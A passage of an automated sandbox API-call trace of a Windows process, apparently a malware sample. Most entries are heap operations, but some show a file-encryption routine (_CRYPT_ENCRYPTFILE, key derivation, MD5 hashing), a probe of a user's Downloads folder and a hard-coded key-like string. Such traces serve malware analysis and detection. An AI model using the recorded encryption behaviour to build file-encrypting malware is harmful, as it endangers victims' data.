returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0085.989] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0085.989] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0085.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0085.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0085.990] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0085.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0085.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0085.991] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0085.991] CloseHandle (hObject=0x298) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0085.991] FreeLibrary (hLibModule=0x772d0000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0085.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0085.992] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0085.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0085.993] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac200 [0085.994] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0085.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0085.995] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0085.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0085.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0085.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0085.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0085.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0085.996] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0085.997] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0085.997] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.997] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0085.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0085.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca418, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0085.997] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0085.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0085.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0085.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0085.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0085.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0085.999] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0085.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0086.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0086.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 